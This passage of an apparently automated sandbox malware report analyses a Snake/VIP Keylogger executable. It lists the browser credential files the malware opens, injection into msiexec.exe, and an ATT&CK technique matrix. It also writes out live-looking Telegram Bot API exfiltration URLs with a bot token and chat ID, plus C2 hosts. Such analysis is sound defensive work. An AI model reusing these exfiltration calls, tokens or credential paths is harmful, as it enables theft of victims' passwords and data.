            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2720, type: MEMORYSTR
            Source: Yara matchFile source: 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: Yara matchFile source: 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2720, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2720, type: MEMORYSTR
            Source: Yara matchFile source: 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            2
            Obfuscated Files or Information
            1
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            PowerShell
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Software Packing
            LSASS Memory14
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
            Process Injection
            1
            DLL Side-Loading
            Security Account Manager11
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Masquerading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            4
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
            Virtualization/Sandbox Evasion
            LSA Secrets31
            Virtualization/Sandbox Evasion
            SSHKeylogging15
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
            Process Injection
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578053 Sample: 66776676676.exe Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 25 reallyfreegeoip.org 2->25 27 api.telegram.org 2->27 29 4 other IPs or domains 2->29 41 Found malware configuration 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 Yara detected VIP Keylogger 2->45 51 5 other signatures 2->51 8 66776676676.exe 26 2->8         started        signatures3 47 Tries to detect the country of the analysis system (by using the IP) 25->47 49 Uses the Telegram API (likely for C&C communication) 27->49 process4 file5 21 C:\Users\user\AppData\...\Southernise233.Bul, Unicode 8->21 dropped 23 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->23 dropped 53 Suspicious powershell command line found 8->53 12 powershell.exe 28 8->12         started        signatures6 process7 signatures8 55 Early bird code injection technique detected 12->55 57 Writes to foreign memory regions 12->57 59 Found suspicious powershell code related to unpacking or dynamic code loading 12->59 61 2 other signatures 12->61 15 msiexec.exe 15 8 12->15         started        19 conhost.exe 12->19         started        process9 dnsIp10 31 api.telegram.org 149.154.167.220, 443, 49897, 49917 TELEGRAMRU United Kingdom 15->31 33 checkip.dyndns.com 193.122.130.0, 49820, 49837, 49845 ORACLE-BMC-31898US United States 15->33 35 3 other IPs or domains 15->35 37 Tries to steal Mail credentials (via file / registry access) 15->37 39 Tries to harvest and steal browser information (history, passwords, etc) 15->39 signatures11

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            66776676676.exe39%ReversingLabsWin32.Spyware.Snakekeylogger
            66776676676.exe36%VirustotalBrowse
            66776676676.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nszF56F.tmp\nsExec.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://www.google.comGGI0%Avira URL Cloudsafe
            https://www.google.comG0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            216.58.208.238
            truefalse
              high
              drive.usercontent.google.com
              172.217.17.65
              truefalse
                high
                reallyfreegeoip.org
                172.67.177.134
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.130.0
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          high
                          http://checkip.dyndns.org/false
                            high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2020/12/2024%20/%2006:42:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              high
                              https://api.telegram.org/bot7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg/sendDocument?chat_id=5434550993&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/msiexec.exe, 00000006.00000002.2994091106.0000000025192000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.orgmsiexec.exe, 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/botmsiexec.exe, 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.microsoft.copowershell.exe, 00000001.00000002.2434001169.0000000007A59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contoso.com/Licensepowershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contoso.com/Iconpowershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://drive.usercontent.google.com/msiexec.exe, 00000006.00000002.2980289658.000000000968F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.google.comGmsiexec.exe, 00000006.00000003.2552341601.00000000096D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://checkip.dyndns.orgmsiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016msiexec.exe, 00000006.00000002.2995674935.00000000260FD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002622C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.00000000260D5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://nsis.sf.net/NSIS_ErrorError66776676676.exe, 00000000.00000002.1733485828.0000000000409000.00000004.00000001.01000000.00000003.sdmp, 66776676676.exe, 00000000.00000000.1723187751.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                                                high
                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17msiexec.exe, 00000006.00000002.2995674935.00000000260FD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002622C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.00000000260D5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000006.00000002.2994091106.0000000025170000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000025161000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://varders.kozow.com:8081msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://aborters.duckdns.org:8081msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.google.commsiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://nsis.sf.net/NSIS_Error66776676676.exe, 66776676676.exe, 00000000.00000002.1733485828.0000000000409000.00000004.00000001.01000000.00000003.sdmp, 66776676676.exe, 00000000.00000000.1723187751.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                                                                high
                                                                                http://51.38.247.67:8081/_send_.php?Lmsiexec.exe, 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2425707404.00000000051A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://drive.google.com/msiexec.exe, 00000006.00000002.2980289658.000000000961A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://anotherarmy.dns.army:8081msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installmsiexec.exe, 00000006.00000002.2995674935.0000000026207000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.0000000026232000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002630A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002608E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.00000000260D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://contoso.com/powershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://reallyfreegeoip.org/xml/8.46.123.189$msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://reallyfreegeoip.orgmsiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000024FFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20amsiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.google.comGGImsiexec.exe, 00000006.00000003.2552341601.00000000096D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://apis.google.commsiexec.exe, 00000006.00000003.2552341601.00000000096D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesmsiexec.exe, 00000006.00000002.2995674935.0000000026207000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.0000000026232000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002630A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002608E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.00000000260D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2425707404.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://api.telegram.org/bot7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg/sendDocument?chat_id=5434msiexec.exe, 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://reallyfreegeoip.org/xml/msiexec.exe, 00000006.00000002.2994091106.0000000024FFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs
                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                149.154.167.220
                                                                                                                api.telegram.orgUnited Kingdom
                                                                                                                62041TELEGRAMRUfalse
                                                                                                                193.122.130.0
                                                                                                                checkip.dyndns.comUnited States
                                                                                                                31898ORACLE-BMC-31898USfalse
                                                                                                                172.217.17.65
                                                                                                                drive.usercontent.google.comUnited States
                                                                                                                15169GOOGLEUSfalse
                                                                                                                216.58.208.238
                                                                                                                drive.google.comUnited States
                                                                                                                15169GOOGLEUSfalse
                                                                                                                172.67.177.134
                                                                                                                reallyfreegeoip.orgUnited States
                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                Analysis ID:1578053
                                                                                                                Start date and time:2024-12-19 08:17:08 +01:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 7m 49s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:default.jbs
                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                Number of analysed new started processes analysed:8
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:0
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Sample name:66776676676.exe
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@6/14@5/5
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 33.3%
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 96%
                                                                                                                • Number of executed functions: 137
                                                                                                                • Number of non-executed functions: 53
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .exe
                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                • Execution Graph export aborted for target msiexec.exe, PID 2720 because it is empty
                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 1448 because it is empty
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                TimeTypeDescription
                                                                                                                02:18:05API Interceptor44x Sleep call for process: powershell.exe modified
                                                                                                                02:19:37API Interceptor286x Sleep call for process: msiexec.exe modified
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                149.154.167.220_Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                    D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                      Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                                            chrome11.exeGet hashmaliciousUnknownBrowse
